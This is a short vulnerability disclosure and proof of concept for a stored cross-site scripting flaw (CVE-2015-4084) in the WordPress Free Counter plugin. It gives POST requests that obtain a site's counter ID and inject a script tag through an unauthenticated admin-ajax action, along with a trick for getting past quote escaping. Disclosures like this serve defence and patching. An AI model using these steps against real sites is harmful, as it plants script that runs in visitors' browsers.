Exploit Title: WordPress Free Counter Plugin [Stored XSS]
Date: 2015/05/25
Exploit Author: Panagiotis Vagenas
Version: 1.1
Tested on: WordPress 4.2.2
Category: webapps
CVE: CVE-2015-4084
- Description
Any authenticated or non-authenticated user can perform a stored XSS attack simply by exploiting wp_ajax_nopriv_check_stat action.
Plugin uses a widget to display website's visits, so any page that contains this widget will also load the malicious JS code.
- Proof of Concept
- Send a post request to `http://www.free-counter.org/Api.php` in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
- As a response we get a serialized indexed array. The value that we need to know is the 'counter_id'.
- Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert(1)</script>`
- Visit a page of the infected website that displays plugin's widget.
Note that the plugin uses the update_option function to store the $POST['value'] contents to DB so any code inserted there will be escaped. Even though a malicious user can omit the quotes in the src attr of the script tag. Most modern browsers will treat the tag as they were there.
- Solution
No official solution yet exists.